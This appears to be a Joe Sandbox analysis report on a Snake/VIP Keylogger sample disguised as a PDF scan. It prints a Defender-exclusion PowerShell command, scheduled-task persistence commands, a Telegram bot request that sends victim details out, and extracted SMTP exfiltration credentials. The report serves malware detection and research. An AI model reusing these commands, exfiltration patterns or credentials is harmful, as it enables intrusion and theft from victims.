Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ParentProcessId: 1036, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", ProcessId: 3528, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\QeSBxb.exe, ParentImage: C:\Users\user\AppData\Roaming\QeSBxb.exe, ParentProcessId: 6708, ParentProcessName: QeSBxb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpD080.tmp", ProcessId: 636, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ParentProcessId: 1036, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp", ProcessId: 5056, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ParentProcessId: 1036, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QeSBxb.exe", ProcessId: 3528, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe", ParentImage: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ParentProcessId: 1036, ParentProcessName: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QeSBxb" /XML "C:\Users\user\AppData\Local\Temp\tmpC1CB.tmp", ProcessId: 5056, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T09:17:13.705596+0200	2803305	3	Unknown Traffic	192.168.2.8	49713	188.114.97.3	443	TCP
2024-10-25T09:17:16.658848+0200	2803305	3	Unknown Traffic	192.168.2.8	49720	188.114.97.3	443	TCP
2024-10-25T09:17:17.016512+0200	2803305	3	Unknown Traffic	192.168.2.8	49721	188.114.97.3	443	TCP
2024-10-25T09:17:20.832277+0200	2803305	3	Unknown Traffic	192.168.2.8	49728	188.114.97.3	443	TCP
2024-10-25T09:17:24.208224+0200	2803305	3	Unknown Traffic	192.168.2.8	49736	188.114.97.3	443	TCP
2024-10-25T09:17:24.257516+0200	2803305	3	Unknown Traffic	192.168.2.8	49738	188.114.97.3	443	TCP
2024-10-25T09:17:27.564925+0200	2803305	3	Unknown Traffic	192.168.2.8	49749	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T09:17:11.331466+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49710	132.226.247.73	80	TCP
2024-10-25T09:17:13.033043+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49710	132.226.247.73	80	TCP
2024-10-25T09:17:14.642211+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49716	132.226.247.73	80	TCP
2024-10-25T09:17:14.829730+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49714	132.226.247.73	80	TCP
2024-10-25T09:17:16.032825+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49714	132.226.247.73	80	TCP
2024-10-25T09:17:16.298451+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49719	132.226.247.73	80	TCP
2024-10-25T09:17:17.579669+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49722	132.226.247.73	80	TCP
2024-10-25T09:17:17.990967+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49723	132.226.247.73	80	TCP
2024-10-25T09:17:19.611042+0200	2803274	2	Potentially Bad Traffic	192.168.2.8	49727	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000D.00000002.3883255353.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "tony@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
Source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "tony@jballosewage.com", "Password": "Jc.2o3o@", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\QeSBxb.exe

ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\QeSBxb.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49718 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49752 version: TLS 1.2

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 091AA812h	1_2_091AA050
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 0152F45Dh	8_2_0152F2C0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 0152F45Dh	8_2_0152F52F
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 0152F45Dh	8_2_0152F4AC
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 0152FC19h	8_2_0152F961
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C631E8h	8_2_05C62DC0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C631E8h	8_2_05C62DD0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C6DC51h	8_2_05C6D9A8
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C6D7F9h	8_2_05C6D550
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C62C21h	8_2_05C62970
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C631E8h	8_2_05C63116
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C6D3A1h	8_2_05C6D0F8
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C6CF49h	8_2_05C6CCA0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_05C60040
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C6FAB9h	8_2_05C6F810
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C6F661h	8_2_05C6F3B8
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C6F209h	8_2_05C6EF60
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C6EDB1h	8_2_05C6EB08
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C60D0Dh	8_2_05C60B30
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C61697h	8_2_05C60B30
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C6E959h	8_2_05C6E6B0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C6E501h	8_2_05C6E258
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 4x nop then jmp 05C6E0A9h	8_2_05C6DE00
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 0147F45Dh	13_2_0147F2C0
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 0147F45Dh	13_2_0147F4AC
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 0147FC19h	13_2_0147F960
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069D31E0h	13_2_069D2DC8
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069D0D0Dh	13_2_069D0B30
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069D1697h	13_2_069D0B30
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069D2C19h	13_2_069D2968
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069DE959h	13_2_069DE6B0
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069DE0A9h	13_2_069DDE00
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069DF209h	13_2_069DEF60
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069DCF49h	13_2_069DCCA0
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069D31E0h	13_2_069D2DC3
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069DD7F9h	13_2_069DD550
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069DE501h	13_2_069DE258
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069DF661h	13_2_069DF3B8
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069DEDB1h	13_2_069DEB08
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069DD3A1h	13_2_069DD0F8
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069DFAB9h	13_2_069DF810
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	13_2_069D0040
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069DDC51h	13_2_069DD9A8
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 4x nop then jmp 069D31E0h	13_2_069D310E

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2018:18:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2025/10/2024%20/%2019:57:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49723 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49716 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49722 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49710 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49727 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49719 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49714 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49713 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49738 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49749 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49720 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49736 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49721 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49728 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49711 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49718 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.81 HTTP/1.1Host: reallyfreegeoip.org
